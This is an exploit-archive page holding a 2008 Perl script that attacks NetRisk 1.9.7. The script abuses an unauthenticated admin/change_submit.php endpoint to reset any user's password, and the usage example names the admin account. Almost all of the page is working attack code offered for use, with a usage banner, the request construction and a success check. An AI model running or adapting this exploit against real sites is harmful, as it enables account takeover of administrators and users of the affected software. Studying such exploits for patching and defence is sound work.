[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : NetRisk 1.9.7 (change_submit.php) Remote Password Change Exploit
# Published : 2008-01-05
# Author : Cod3rZ
# Previous Title : Invision Power Board <= 2.1.7 ACTIVE XSS/SQL Injection Exploit
# Next Title : MODx CMS 0.9.6.1 Multiple Remote Vulnerabilities
#!/usr/bin/perl
#=========================================================================================================================#
# _ ____ _ _ _ _ #
# __ ___ __| |__ /_ _ ___ | |_ ___| | |_____ __ _____| |__ ___ _ _ #
# / _/ _ / _` ||_ '_|_ / _ | ' / -_) | / _ V V / -_) '_ _ / -_) || | #
# _____/__,_|___/_| /__| (_) |_||____|_|____/_/_/___|_.__/ (_) ___|_,_| #
#=========================================================================================================================#
# Author: Cod3rZ #
# Site: http://cod3rz.helloweb.eu #
#=========================================================================================================================#
# Status: Public #
#=========================================================================================================================#
# Board: NetRisk 1.9.7 #
# Download: http://phprisk.org/netrisk_1.9.7.zip #
#=========================================================================================================================#
# Vuln Type: Remote Password Change [Exploit] #
# Severity: Highest #
#=========================================================================================================================#
# The ACP haven't control and we can change the password of the other users #
#=========================================================================================================================#
# http://[site]/admin/change_submit.php?username=[user]&new_pass=[newpass] #
#=========================================================================================================================#
# NetRisk contains a lot of bugs: RFI, SQL Injection, ecc; but this is the highest vuln and i wouldn't post those #
#=========================================================================================================================#
use LWP::UserAgent;
use HTTP::Request::Common;
$lwp = new LWP::UserAgent;
system('cls');
$site = $ARGV[0];
$user = $ARGV[1];
$pass = $ARGV[2];
print q{ ---------------------------------------------------------------------
:: NetRisk 1.9.7 Remote Password Change Exploit ::
---------------------------------------------------------------------
Author : Cod3rZ
Email : songforthemoment@yahoo.it
Site : http://cod3rz.helloweb.eu
---------------------------------------------------------------------};
if(!$site || !$user || !$pass)
{
print q{
Usage: perl netrisk.pl [site] [user] [newpass]
Usage: perl netrisk.pl site.com/netrisk admin 123456
---------------------------------------------------------------------};
system('exit');
}
else {
print "
Site: $site
User: $user
Pass: $pass
---------------------------------------------------------------------
Waiting...
---------------------------------------------------------------------";
$connect = $lwp->request(GET $site."/admin/change_submit.php?username=".$user."&new_pass=".$pass);
$content = $connect->content;
if($content =~ /username->/) {
print "
Password Changed
---------------------------------------------------------------------"; }
else { print "
Error
---------------------------------------------------------------------"; }
}
# http://cod3rz.helloweb.eu
# www.Syue.com [2008-01-05]